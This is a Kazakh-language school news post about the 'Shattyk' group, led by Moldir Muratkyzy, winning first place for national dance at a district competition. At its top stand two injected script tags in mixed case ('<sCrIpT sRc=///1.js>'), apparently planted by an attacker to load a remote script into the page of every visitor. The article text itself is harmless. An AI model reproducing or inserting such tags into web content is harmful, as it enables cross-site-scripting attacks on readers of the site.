<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>
21.01.2017
Би сайысының жеңімпаздары
18-наурыз күні Жақсы №2 мектебінде аудандық би сайысы өткізілді. Ғ.Әбдірахманұлы атындағы Қима орта мектебінен 12-14 жас аралығынан «Шаттық», 15-17 жас аралығында «POPCORN» топтары өз өнерлерін көрсетті.
Ауданның әр мектебі үлкен жауапкершілікпен дайындалып, тамаша билерін көрермендер назарына ұсынды. Сайыс шарты бойынша балалардың өнері 3 бағыт бойынша бағаланды:
7-11 жас аралығында балалар биі;
12-14 жас аралығында ұлттық биі;
15-17 жас аралығында заманауи биі.
Нәтижесінде, мектептің би үйірмесінің жетекшісі Мөлдір Мұратқызы дайындаған «Шаттық» тобы ұлттық билер арасында 1-орынды иеленді.
Жеңімпаздарды жеңіспен құттықтап, жас маман Мөлдір Мұратқызына алдағы жұмыста шығармашылық тілейміз. Жеңістеріңіз құтты болсын!!!